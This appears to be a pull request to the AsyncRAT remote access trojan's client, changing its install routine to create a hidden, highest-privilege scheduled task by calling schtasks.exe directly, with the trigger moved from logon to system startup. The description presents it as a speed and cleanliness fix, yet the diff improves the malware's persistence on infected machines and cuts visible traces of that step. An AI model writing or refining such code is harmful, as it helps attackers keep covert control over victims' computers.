### PR TITLE
Simplify Schtasks Startup Task

### DIFF
--- a/AsyncRAT-C#/Client/Install/NormalStartup.cs
+++ b/AsyncRAT-C#/Client/Install/NormalStartup.cs
@@ -42,8 +42,8 @@ namespace Client.Install
                         {
                             StartInfo = new ProcessStartInfo
                             {
-                                FileName = "cmd.exe",
-                                Arguments = "/c schtasks /create /f /sc ONLOGON /RL HIGHEST /tn " + @"""'" + Settings.InstallFile + @"""'" + " /tr " + @"""'" + installfullpath + @"""'",
+                                FileName = "schtasks.exe",
+                                Arguments = "/create /f /sc ONSTART /RL HIGHEST /tn " + @"""'" + Settings.InstallFile + @"""'" + " /tr " + @"""'" + installfullpath + @"""'",
                                 WindowStyle = ProcessWindowStyle.Hidden,
                                 CreateNoWindow = true,
                             }


### PR DESCRIPTION
removed the usage of cmd.exe as a relay for the command, parse the start requirements directly schtasks.exe directly instead removing the need for a conhost task to be created and speeds up the task a bit.